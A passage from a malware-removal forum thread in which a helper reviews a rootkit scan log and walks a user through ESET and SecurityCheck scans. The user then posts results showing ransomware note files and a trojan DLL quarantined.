20:03:18.0793 0x0b14  [ 5F66B7BB330AA80067FC66149A692620, 92C5D7115A168A23108B65EEEB5FBA8FA43D781855355792596D2419160263C2 ] WIMMount        C:\WINDOWS\system32\drivers\wimmount.sys
20:03:18.0809 0x0b14  WIMMount - ok
20:03:18.0824 0x0b14  WinDefend - ok
20:03:18.0949 0x0b14  [ 10DAD6A7FC617A221313BD584E3C3A00, F139B878668ECF38FE59831E8595A207D5CEEE76C6FFDA8C9F735435E601A763 ] WinHttpAutoProxySvc C:\WINDOWS\system32\winhttp.dll
20:03:18.0996 0x0b14  WinHttpAutoProxySvc - ok
20:03:19.0106 0x0b14  [ FC8BD690321216C32BB58B035B6D5674, D61698DB19D9DB2593B60B6BA13F7B7735667206F41D751D507135469D6D3CDD ] Winmgmt         C:\WINDOWS\system32\wbem\WMIsvc.dll
20:03:19.0137 0x0b14  Winmgmt - ok
20:03:19.0340 0x0b14  [ 75436315AA383CF527695C6D49D0CA59, E3D55F2ACBD45D4D031FA6CA799394459C89BE50FF6ADE4FE36F2CAB2D2E63D0 ] WinRM           C:\WINDOWS\system32\WsmSvc.dll
20:03:19.0606 0x0b14  WinRM - ok
20:03:19.0683 0x0b14  [ 4F2A80D65AE6F845776E2F06AE6782ED, 2455537C048115435D9EDE4B18F9F54C43912076AEF36BDEFEC35AF2140B8B2E ] WirelessButtonDriver C:\WINDOWS\System32\drivers\WirelessButtonDriver64.sys
20:03:19.0714 0x0b14  WirelessButtonDriver - ok
20:03:19.0855 0x0b14  [ DC079BA8390089E4EBCA63D27EEA3ECB, 4D549217A68292E2B16C09FD9F84317011EE54A2DAF4E2AB85554267DF0D3249 ] WlanSvc         C:\WINDOWS\System32\wlansvc.dll
20:03:19.0949 0x0b14  WlanSvc - ok
20:03:20.0058 0x0b14  [ 06BF5897949A8F24893F792E876B71F5, 9D3719492A86BF52A56E2EA798FD6FDB5862A03F6D360FCC4B0CEA9BE9792AE4 ] wlidsvc         C:\WINDOWS\system32\wlidsvc.dll
20:03:20.0183 0x0b14  wlidsvc - ok
20:03:20.0230 0x0b14  [ 2834D9D3B4F554A39C72F00EA3F0E128, D10124343C67FE9A0B711AD569BB8080495FCEA0ECEF9AC3F3FBD6865F436A44 ] WmiAcpi         C:\WINDOWS\System32\drivers\wmiacpi.sys
20:03:20.0230 0x0b14  WmiAcpi - ok
20:03:20.0292 0x0b14  [ B96F7A1236C3F21212DE2C40A3DDB005, 5A29EBB6DA036E303611EB1304192655021405BB05452FD37886DDE604FF0D9D ] wmiApSrv        C:\WINDOWS\system32\wbem\WmiApSrv.exe
20:03:20.0308 0x0b14  wmiApSrv - ok
20:03:20.0340 0x0b14  WMPNetworkSvc - ok
20:03:20.0402 0x0b14  [ 7FC5667DF73D4B04AA457CC3A4180E09, CB7B014945DCA16B6D120DBE0E5876C4C867A4ACD3C3536AEADC14B908613D4E ] Wof             C:\WINDOWS\system32\drivers\Wof.sys
20:03:20.0418 0x0b14  Wof - ok
20:03:20.0589 0x0b14  [ 588040D595BBF0856CA1ADD941A8ED17, CBC92BB5453FE1BEA6F33239B7CE884F312559591383408EA5F95A006156C5D3 ] workfolderssvc  C:\WINDOWS\system32\workfolderssvc.dll
20:03:20.0714 0x0b14  workfolderssvc - ok
20:03:20.0777 0x0b14  [ A2468CC3509394A33C4C32F99563D845, 62690C7D41F382DF74B8F4B942647842858E37DE35FF2DE028192E4D09ABB2C5 ] wpcfltr         C:\WINDOWS\system32\DRIVERS\wpcfltr.sys
20:03:20.0808 0x0b14  wpcfltr - ok
20:03:20.0855 0x0b14  [ 19F4DF69876DA7E9C4965351560FE6B7, 127247A7964F55EE3AF842D25120F5ACD387632BEE2BF3D28FAC05840CEA19BA ] WPCSvc          C:\WINDOWS\System32\wpcsvc.dll
20:03:20.0933 0x0b14  WPCSvc - ok
20:03:20.0964 0x0b14  [ 2ADE11F3D84709C5F6781E4C59F11683, F003C43396CF8FCF44EAB87583650DB4D2A233322D28D6A78D1694945D9073BB ] WPDBusEnum      C:\WINDOWS\system32\wpdbusenum.dll
20:03:20.0980 0x0b14  WPDBusEnum - ok
20:03:21.0043 0x0b14  [ 9F2904B55F6CECCD1A8D986B5CE2609A, E19ED4DD3CEF3A22C058FC324824604FB3FC98A029C94E6C2A3389F938D680B6 ] WpdUpFltr       C:\WINDOWS\system32\drivers\WpdUpFltr.sys
20:03:21.0089 0x0b14  WpdUpFltr - ok
20:03:21.0136 0x0b14  [ AE072B0339D0A18E455DC21666CAD572, AB1DAEA25E2C7AD610818D4B4783F6D4190D85EBB3963BBAD410E8CEA7899EDB ] ws2ifsl         C:\WINDOWS\system32\drivers\ws2ifsl.sys
20:03:21.0183 0x0b14  ws2ifsl - ok
20:03:21.0230 0x0b14  [ 5596C0960ED6ED7494BF2A55DE428684, C95CF09A657F37F421CC80E16F2F95B8EC59A8D5D48F104551155EAC8E53DCB2 ] wscsvc          C:\WINDOWS\System32\wscsvc.dll
20:03:21.0230 0x0b14  wscsvc - ok
20:03:21.0246 0x0b14  WSearch - ok
20:03:21.0667 0x0b14  [ 6B2D71124C1EA86B74412F414C42431D, 078CC6C9667EF6BDA3E6900BC26A5A5B030CAA66928A6BBB7B7DC43C5C199EDC ] WSService       C:\WINDOWS\System32\WSService.dll
20:03:21.0903 0x0b14  WSService - ok
20:03:22.0294 0x0b14  [ 50CEC061C6D6FD2B9C89BECD08991CCB, 31EB1601426223E712C4E4AA29410EDFC81E020996A402BD3E850A2EAF127286 ] wuauserv        C:\WINDOWS\system32\wuaueng.dll
20:03:22.0559 0x0b14  wuauserv - ok
20:03:22.0700 0x0b14  [ 481286719402E4BAEFEA0604AB1B5113, F3CF65DF2AB39F79AE4C1335831408418E40726706E0242677E8B96B0FAD988F ] WudfPf          C:\WINDOWS\system32\drivers\WudfPf.sys
20:03:22.0716 0x0b14  WudfPf - ok
20:03:22.0747 0x0b14  [ D7B4859227B02BCC1055B279A63C937F, 82C99844CC596C2723523B1B98573488FF23337947B78AA04BA21E58394BB751 ] WUDFRd          C:\WINDOWS\System32\drivers\WUDFRd.sys
20:03:22.0762 0x0b14  WUDFRd - ok
20:03:22.0794 0x0b14  [ D7B4859227B02BCC1055B279A63C937F, 82C99844CC596C2723523B1B98573488FF23337947B78AA04BA21E58394BB751 ] WUDFSensorLP    C:\WINDOWS\system32\DRIVERS\WUDFRd.sys
20:03:22.0809 0x0b14  WUDFSensorLP - ok
20:03:22.0856 0x0b14  [ 51D28F7F1F888DDCF2C67DCF3B79A5D3, 74FF2936AFCEB9A36175D5B00EB91A5AD614B52BE3FB3FA9B994A025A484D2B7 ] wudfsvc         C:\WINDOWS\System32\WUDFSvc.dll
20:03:22.0872 0x0b14  wudfsvc - ok
20:03:22.0966 0x0b14  [ A0900F8F628B5AF6841414EB3CF11E50, 8A531F2472FF4B4D895D469D28C215C834ECADBEF539894B8F3F606079A86184 ] WwanSvc         C:\WINDOWS\System32\wwansvc.dll
20:03:23.0044 0x0b14  WwanSvc - ok
20:03:23.0091 0x0b14  ================ Scan global ===============================
20:03:23.0231 0x0b14  [ 243F54DBA6EB48A369CA465E263ABA4A, 9D9F9DE783D000F3EA130EB68FD71319F21E4F1CD4232FB8B2F8A9A67E08F5F4 ] C:\WINDOWS\system32\basesrv.dll
20:03:23.0294 0x0b14  [ EAB311B0A7A8EA0346F14F08D4BC8F46, 11168E4074679F8A69DA714C0ABD0C68BA49D171B379343F14783C9C563202CA ] C:\WINDOWS\system32\winsrv.dll
20:03:23.0388 0x0b14  [ 3600ED7EA8AED849E20700551C0BD63B, 4A8C346C1646E80B58EF93F87F915A41E05CA2E993BB1C96955AE62A0669AF66 ] C:\WINDOWS\system32\sxssrv.dll
20:03:23.0497 0x0b14  [ E0C7813A97CA7947FF5C18A8F3B61A45, 083BB4F3B20419C87DB656F1465E5F782ACDE76838CDE6207F26AAD035C69DE0 ] C:\WINDOWS\system32\services.exe
20:03:23.0528 0x0b14  [ Global ] - ok
20:03:23.0528 0x0b14  ================ Scan MBR ==================================
20:03:23.0559 0x0b14  [ 5FB38429D5D77768867C76DCBDB35194 ] \Device\Harddisk0\DR0
20:03:23.0653 0x0b14  \Device\Harddisk0\DR0 - ok
20:03:23.0653 0x0b14  ================ Scan VBR ==================================
20:03:23.0810 0x0b14  [ ECE07EFD2A07758212FE5D9E24B2C53F ] \Device\Harddisk0\DR0\Partition1
20:03:23.0920 0x0b14  \Device\Harddisk0\DR0\Partition1 - ok
20:03:23.0935 0x0b14  [ FCF02374247C4FF70FA948D7D729303D ] \Device\Harddisk0\DR0\Partition2
20:03:23.0967 0x0b14  \Device\Harddisk0\DR0\Partition2 - ok
20:03:23.0998 0x0b14  [ B1E27AA018409DE6BFD73F8AFB883A65 ] \Device\Harddisk0\DR0\Partition3
20:03:24.0014 0x0b14  \Device\Harddisk0\DR0\Partition3 - ok
20:03:24.0045 0x0b14  [ 9943BD10C11F11A95DE7165464A9FB9F ] \Device\Harddisk0\DR0\Partition4
20:03:24.0045 0x0b14  \Device\Harddisk0\DR0\Partition4 - ok
20:03:24.0092 0x0b14  [ 91F38923386AA19826BE833311AE66CE ] \Device\Harddisk0\DR0\Partition5
20:03:24.0139 0x0b14  \Device\Harddisk0\DR0\Partition5 - ok
20:03:24.0170 0x0b14  [ DD5B2873F540D73CC86B2AD1D16D9D4B ] \Device\Harddisk0\DR0\Partition6
20:03:24.0232 0x0b14  \Device\Harddisk0\DR0\Partition6 - ok
20:03:24.0232 0x0b14  ================ Scan generic autorun ======================
20:03:24.0889 0x0b14  [ AF04B6DDF123991C625472494BC1221C, D02BEC96FF466187130B5868DCB70E56CEE25101A8889A1AEF3CFE60ECBE6DC6 ] C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
20:03:25.0295 0x0b14  RTHDVCPL - ok
20:03:25.0326 0x0b14  SynTPEnh - ok
20:03:25.0638 0x0b14  [ D6FF94ED4D086489A453134F0AE33FD3, 47E1CE640E9AB6B8DD148DACA80B1D07BCF69DF9F6B109285419447B9A4025FF ] C:\Program Files (x86)\CyberLink\Power2Go8\VirtualDrive.exe
20:03:25.0670 0x0b14  CLVirtualDrive - ok
20:03:25.0983 0x0b14  [ B7995C675014EEBE77A0BEB7AFCCFC08, 41D186C63273301CF0A1C1EE7B6EB0BB75A251DD441532C5CEB7A4095FB103CD ] C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe
20:03:25.0998 0x0b14  RemoteControl10 - ok
20:03:26.0186 0x0b14  [ EBAE9EE13F51F38B57D616CF4A420682, E27969D5F0B796C2C8DA7C46680AB6C797A8F297B105477B71B4871F8F7B62FD ] C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe
20:03:26.0217 0x0b14  HP Quick Launch - ok
20:03:26.0639 0x0b14  [ 73F1B07CF82235B25BCC3E9A7522ACCB, 47221B8DFF5A44050AFB0AB5A249FEECE36BE2E000D6529E099128EEDFA647DA ] C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe
20:03:26.0670 0x0b14  StartCCC - ok
20:03:26.0920 0x0b14  [ 5120CD65A74A5E054FB2B0577688024C, 2C771743C797ED2F94E4C0CD7472D20532DB6C3E95DEB0DA4D14D6B5469EE273 ] C:\Program Files (x86)\Avira\Launcher\Avira.Systray.exe
20:03:26.0920 0x0b14  Avira Systray - ok
20:03:27.0498 0x0b14  [ 28DEF0EFB36D172EAA5A08EB09CF75DF, 62D07A28167AEBFB9511830BFBBEAAB17CC24D57FF8D07F1414D921135BC9024 ] C:\Program Files (x86)\Avira\Antivirus\avgnt.exe
20:03:27.0529 0x0b14  avgnt - ok
20:03:27.0847 0x0b14  AV detected via SS2: Avira Antivirus, C:\Program Files (x86)\Avira\Antivirus\wsctool.exe ( 15.0.12.402 ), 0x41000 ( enabled : updated )
20:03:27.0894 0x0b14  AV detected via SS2: Windows Defender, C:\Program Files\Windows Defender\MSASCui.exe ( 4.7.205.0 ), 0x60100 ( disabled : updated )
20:03:27.0956 0x0b14  Win FW state via NFP2: enabled ( trusted )
20:03:27.0956 0x0b14  ============================================================
20:03:27.0956 0x0b14  Scan finished
20:03:27.0956 0x0b14  ============================================================
20:03:27.0972 0x09c8  Detected object count: 0
20:03:27.0972 0x09c8  Actual detected object count: 0
20:11:45.0195 0x1114  Deinitialize success
 

  • 0

#6
Pyxis
Posted 31 July 2015 - 05:02 AM

Pyxis

    Trusted Helper

  • Malware Removal
  • 1,228 posts
You are to copy the code into Notepad (which you did correctly). Everything looks good on my end. How is your computer running now? :) The below step will take the most time as it is a comprehensive scan, but you should be good to go if we get good results.
  • Step 1

    Run a free 'ESET Online Scan by ESET' by firstly saving the file to your desktop.
    • Double-click esetsmartinstaller_enu.exe. Accept the Terms of Use then click on Start.
    • Ensure the following settings are followed before clicking Start (you may or may not see the software warning at the very bottom):

      nvMhqop.png

    • The virus signature database will begin to download. Wait for the scan to end--it may take several hours.
    • Upon completion, select List of found threats > Export to text file....
    • Press Back and put a check on the following:
      • Uninstall application on close
      • Delete quarantined files
    • Click Finish.
    • Copy (CTRL + A and CTRL + C) and paste (CTRL + V) the content of the log in your next reply.
  • Step 2

    Download 'SecurityCheck by screen317' and save it to your desktop.
    • Simply double-click the program icon to run it. It will ask for administrator privileges.
    • A black window will appear. Press any key to continue.
    • Wait for it to finish. It won't take long.
    • A log will automatically pop-up after once done.
    • Copy (CTRL + A and CTRL + C) and paste (CTRL + V) the content of the log in your next reply.
    Note: If you get an error about an unsupported operating system, please reboot your computer and try again.
  • Logs to Post

    In summary of the above, I will need you to post the following log(s):
    • checkup.txt (SecurityCheck)
    • log.txt (ESET Online Scan)

  • 0

#7
smwifey
Posted 01 August 2015 - 02:53 PM

smwifey

    Member

  • Topic Starter
  • Member
  • PipPip
  • 85 posts

Seems to be running better.  No pop-ups recently.  Scans found lots, though.  Also, is it possible/advisable to get rid of Windows Defender?  Thanks for all of your help.

 

C:\FRST\Quarantine\C\Users\Richie\AppData\Local\DECRYPT_INSTRUCTION.HTML.xBAD Win32/Filecoder.CR trojan deleted - quarantined
C:\FRST\Quarantine\C\Users\Richie\AppData\Local\DECRYPT_INSTRUCTION.TXT.xBAD Win32/Filecoder.CR trojan deleted - quarantined
C:\FRST\Quarantine\C\Users\Richie\AppData\Local\HELP_DECRYPT.HTML.xBAD Win32/Filecoder.CR trojan deleted - quarantined
C:\FRST\Quarantine\C\Users\Richie\AppData\Local\HELP_DECRYPT.TXT.xBAD Win32/Filecoder.CR trojan deleted - quarantined
C:\FRST\Quarantine\C\Users\Richie\AppData\Local\HELP_DECRYPT.URL.xBAD Win32/Filecoder.EA trojan deleted - quarantined
C:\FRST\Quarantine\C\Users\Richie\AppData\Roaming\DECRYPT_INSTRUCTION.HTML.xBAD Win32/Filecoder.CR trojan deleted - quarantined
C:\FRST\Quarantine\C\Users\Richie\AppData\Roaming\DECRYPT_INSTRUCTION.TXT.xBAD Win32/Filecoder.CR trojan deleted - quarantined
C:\FRST\Quarantine\C\Users\Richie\AppData\Roaming\HELP_DECRYPT.HTML.xBAD Win32/Filecoder.CR trojan deleted - quarantined
C:\FRST\Quarantine\C\Users\Richie\AppData\Roaming\HELP_DECRYPT.TXT.xBAD Win32/Filecoder.CR trojan deleted - quarantined
C:\FRST\Quarantine\C\Users\Richie\AppData\Roaming\HELP_DECRYPT.URL.xBAD Win32/Filecoder.EA trojan deleted - quarantined
C:\Users\Public\HELP_DECRYPT.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Public\HELP_DECRYPT.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Public\HELP_DECRYPT.URL Win32/Filecoder.EA trojan deleted - quarantined
C:\Users\Public\CyberLink\HELP_DECRYPT.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Public\CyberLink\HELP_DECRYPT.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Public\CyberLink\HELP_DECRYPT.URL Win32/Filecoder.EA trojan deleted - quarantined
C:\Users\Richie\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\HELP_DECRYPT.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\HELP_DECRYPT.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\HELP_DECRYPT.URL Win32/Filecoder.EA trojan deleted - quarantined
C:\Users\Richie\AppData\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\AppData\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\AppData\HELP_DECRYPT.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\AppData\HELP_DECRYPT.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\AppData\HELP_DECRYPT.URL Win32/Filecoder.EA trojan deleted - quarantined
C:\Users\Richie\AppData\Local\AMD\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\AppData\Local\AMD\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\AppData\Local\AMD\HELP_DECRYPT.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\AppData\Local\AMD\HELP_DECRYPT.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\AppData\Local\AMD\HELP_DECRYPT.URL Win32/Filecoder.EA trojan deleted - quarantined
C:\Users\Richie\AppData\Local\AMD\Fuel\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\AppData\Local\AMD\Fuel\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\AppData\Local\AMD\Fuel\HELP_DECRYPT.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\AppData\Local\AMD\Fuel\HELP_DECRYPT.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\AppData\Local\AMD\Fuel\HELP_DECRYPT.URL Win32/Filecoder.EA trojan deleted - quarantined
C:\Users\Richie\AppData\Local\Microsoft\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\AppData\Local\Microsoft\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\AppData\Local\Microsoft\HELP_DECRYPT.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\AppData\Local\Microsoft\HELP_DECRYPT.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\AppData\Local\Microsoft\HELP_DECRYPT.URL Win32/Filecoder.EA trojan deleted - quarantined
C:\Users\Richie\AppData\Local\Microsoft\Internet Explorer\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\AppData\Local\Microsoft\Internet Explorer\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\AppData\Local\Microsoft\Internet Explorer\HELP_DECRYPT.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\AppData\Local\Microsoft\Internet Explorer\HELP_DECRYPT.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\AppData\Local\Microsoft\Internet Explorer\HELP_DECRYPT.URL Win32/Filecoder.EA trojan deleted - quarantined
C:\Users\Richie\AppData\Local\Microsoft\Photo Acquisition\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\AppData\Local\Microsoft\Photo Acquisition\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\AppData\Local\Microsoft\Photo Acquisition\HELP_DECRYPT.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\AppData\Local\Microsoft\Photo Acquisition\HELP_DECRYPT.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\AppData\Local\Microsoft\Photo Acquisition\HELP_DECRYPT.URL Win32/Filecoder.EA trojan deleted - quarantined
C:\Users\Richie\AppData\Local\Microsoft\Windows Mail\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\AppData\Local\Microsoft\Windows Mail\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\AppData\Local\Microsoft\Windows Mail\HELP_DECRYPT.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\AppData\Local\Microsoft\Windows Mail\HELP_DECRYPT.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\AppData\Local\Microsoft\Windows Mail\HELP_DECRYPT.URL Win32/Filecoder.EA trojan deleted - quarantined
C:\Users\Richie\AppData\Local\Microsoft\Windows Mail\Stationery\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\AppData\Local\Microsoft\Windows Mail\Stationery\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\AppData\Local\Microsoft\Windows Mail\Stationery\HELP_DECRYPT.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\AppData\Local\Microsoft\Windows Mail\Stationery\HELP_DECRYPT.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\AppData\Local\Microsoft\Windows Mail\Stationery\HELP_DECRYPT.URL Win32/Filecoder.EA trojan deleted - quarantined
C:\Users\Richie\AppData\LocalLow\xywnvjl.dll Win32/Viknok.M trojan deleted - quarantined
C:\Users\Richie\AppData\Roaming\Adobe\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\AppData\Roaming\Adobe\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\AppData\Roaming\Adobe\HELP_DECRYPT.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\AppData\Roaming\Adobe\HELP_DECRYPT.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\AppData\Roaming\Adobe\HELP_DECRYPT.URL Win32/Filecoder.EA trojan deleted - quarantined
C:\Users\Richie\AppData\Roaming\Adobe\Flash Player\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\AppData\Roaming\Adobe\Flash Player\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\AppData\Roaming\Adobe\Flash Player\HELP_DECRYPT.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\AppData\Roaming\Adobe\Flash Player\HELP_DECRYPT.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\AppData\Roaming\Adobe\Flash Player\HELP_DECRYPT.URL Win32/Filecoder.EA trojan deleted - quarantined
C:\Users\Richie\AppData\Roaming\Adobe\Flash Player\AssetCache\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\AppData\Roaming\Adobe\Flash Player\AssetCache\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\AppData\Roaming\Adobe\Flash Player\AssetCache\HELP_DECRYPT.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\AppData\Roaming\Adobe\Flash Player\AssetCache\HELP_DECRYPT.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\AppData\Roaming\Adobe\Flash Player\AssetCache\HELP_DECRYPT.URL Win32/Filecoder.EA trojan deleted - quarantined
C:\Users\Richie\AppData\Roaming\Adobe\Flash Player\AssetCache\EBGLKRWZ\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\AppData\Roaming\Adobe\Flash Player\AssetCache\EBGLKRWZ\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\AppData\Roaming\Adobe\Flash Player\AssetCache\EBGLKRWZ\HELP_DECRYPT.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\AppData\Roaming\Adobe\Flash Player\AssetCache\EBGLKRWZ\HELP_DECRYPT.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\AppData\Roaming\Adobe\Flash Player\AssetCache\EBGLKRWZ\HELP_DECRYPT.URL Win32/Filecoder.EA trojan deleted - quarantined
C:\Users\Richie\AppData\Roaming\Hewlett-Packard\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\AppData\Roaming\Hewlett-Packard\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\AppData\Roaming\Hewlett-Packard\HELP_DECRYPT.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\AppData\Roaming\Hewlett-Packard\HELP_DECRYPT.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\AppData\Roaming\Hewlett-Packard\HELP_DECRYPT.URL Win32/Filecoder.EA trojan deleted - quarantined
C:\Users\Richie\AppData\Roaming\Hewlett-Packard\HP Setup\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\AppData\Roaming\Hewlett-Packard\HP Setup\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\AppData\Roaming\Hewlett-Packard\HP Setup\HELP_DECRYPT.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\AppData\Roaming\Hewlett-Packard\HP Setup\HELP_DECRYPT.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\AppData\Roaming\Hewlett-Packard\HP Setup\HELP_DECRYPT.URL Win32/Filecoder.EA trojan deleted - quarantined
C:\Users\Richie\AppData\Roaming\Hewlett-Packard\HP Setup\Metrics\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\AppData\Roaming\Hewlett-Packard\HP Setup\Metrics\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\AppData\Roaming\Hewlett-Packard\HP Setup\Metrics\HELP_DECRYPT.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\AppData\Roaming\Hewlett-Packard\HP Setup\Metrics\HELP_DECRYPT.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\AppData\Roaming\Hewlett-Packard\HP Setup\Metrics\HELP_DECRYPT.URL Win32/Filecoder.EA trojan deleted - quarantined
C:\Users\Richie\Documents\HELP_DECRYPT.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\Documents\HELP_DECRYPT.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\Documents\HELP_DECRYPT.URL Win32/Filecoder.EA trojan deleted - quarantined
C:\Users\Richie\Documents\CyberLink\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\Documents\CyberLink\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\Documents\CyberLink\HELP_DECRYPT.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\Documents\CyberLink\HELP_DECRYPT.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\Documents\CyberLink\HELP_DECRYPT.URL Win32/Filecoder.EA trojan deleted - quarantined
C:\Users\Richie\Documents\CyberLink\LocalStorage_V2\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\Documents\CyberLink\LocalStorage_V2\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\Documents\CyberLink\LocalStorage_V2\HELP_DECRYPT.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\Documents\CyberLink\LocalStorage_V2\HELP_DECRYPT.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\Documents\CyberLink\LocalStorage_V2\HELP_DECRYPT.URL Win32/Filecoder.EA trojan deleted - quarantined
C:\Users\Richie\Documents\CyberLink\LocalStorage_V2\DefaultMember\HELP_DECRYPT.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\Documents\CyberLink\LocalStorage_V2\DefaultMember\HELP_DECRYPT.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\Documents\CyberLink\LocalStorage_V2\DefaultMember\HELP_DECRYPT.URL Win32/Filecoder.EA trojan deleted - quarantined
C:\Users\Richie\Documents\CyberLink\LocalStorage_V2\DefaultMember\Movie_00002306-0002-0035-0369-3B13BB50BB2C\HELP_DECRYPT.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\Documents\CyberLink\LocalStorage_V2\DefaultMember\Movie_00002306-0002-0035-0369-3B13BB50BB2C\HELP_DECRYPT.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\Documents\CyberLink\LocalStorage_V2\DefaultMember\Movie_00002306-0002-0035-0369-3B13BB50BB2C\HELP_DECRYPT.URL Win32/Filecoder.EA trojan deleted - quarantined
